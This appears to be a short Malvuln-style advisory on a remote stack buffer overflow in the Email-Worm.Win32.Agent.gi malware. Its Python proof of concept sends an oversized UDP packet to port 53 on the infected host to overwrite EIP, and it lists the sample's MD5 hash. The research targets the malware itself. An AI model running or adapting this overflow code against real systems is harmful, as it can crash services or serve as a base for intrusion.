Email-Worm.Win32.Agent.gi Remote Stack Buffer Overflow

Email-Worm.Win32.Agent.gi malware suffers from a remote stack buffer overflow vulnerability.

Exploit/PoC:

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=53

def doit():
    s=socket(AF_INET, SOCK_DGRAM)
    s.connect((MALWARE_HOST, PORT))

    #R for EIP
    PACKOLA="A"*324+"R"*8

    s.send(PACKOLA)
    s.close()
    
    print("Email-Worm.Win32.Agent.gi / Remote UDP Buffer Overflow (SYSTEM)")
    print("MD5: 74e65773735f977185f6a09f1472ea46");
    print("By Malvuln");

if __name__=="__main__":
    doit()